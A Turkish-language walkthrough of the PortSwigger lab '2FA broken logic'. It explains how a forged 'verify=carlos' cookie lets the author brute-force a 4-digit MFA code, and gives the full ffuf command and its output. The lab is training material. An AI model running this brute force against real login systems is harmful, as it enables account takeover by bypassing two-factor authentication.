Lab: 2FA broken logic
url: https://portswigger.net/web-security/authentication/multi-factor/lab-2fa-broken-logic

Amaç:

Carlosun arayüzüne erişmek.

Analiz:

    -- Kendi kimliğimizle giriş yaptık ve süreç paketlerini inceledik
    Sistemde session değil verify parametresi esas alınıyor anlaşılan.

    -- İsteklerde session parametresini sildiğimizde yinede istediğimiz eylem sonuçlanıyor

    -- Carlos adına bir istekde bulunduk ve email almasını sağladık 

    -- Tek yapmamız gereken emailine gelen 4 haneli sayılarla bruteforce yapmak

Payload:


    -- Payloadı hazırlayabilmek için bize sayı listesi lazım 1000 ile 10000 arası sayıları içeren.
    -- Script.py içeriği size bu mfa_wordlis.txt yi oluşturacaktır.
    -- Daha sonra doğrulama isteğini alıp ffuf aracılığıyla bruteforce deniyoruz.

    ffuf -w "/home/erdem/GitHub/Broken Authentication/mfa_wordlist.txt":FUZZ \
     -u https://0a19001f048174158be685f1004c00da.web-security-academy.net/login2 \
     -X POST \
     -H "Content-Type: application/x-www-form-urlencoded" \
     -H "Cookie: verify=carlos" \
     -d "mfa-code=FUZZ" \
     -fc 200 -v

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : POST
 :: URL              : https://0a19001f048174158be685f1004c00da.web-security-academy.net/login2
 :: Wordlist         : FUZZ: /home/erdem/GitHub/Broken Authentication/mfa_wordlist.txt
 :: Header           : Content-Type: application/x-www-form-urlencoded
 :: Header           : Cookie: verify=carlos
 :: Data             : mfa-code=FUZZ
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 200
________________________________________________

[Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 148ms]
| URL | https://0a19001f048174158be685f1004c00da.web-security-academy.net/login2
| --> | /my-account?id=carlos
    * FUZZ: 1123


Ve doğrulama kodunu bulduk .

-- Doğrulama kodu ile paketi yollayım session paketini alıyoruz my-account kısmına bu sessiona isimsiz girersek eğer
carlosun arayüzüne erişmiş oluruz
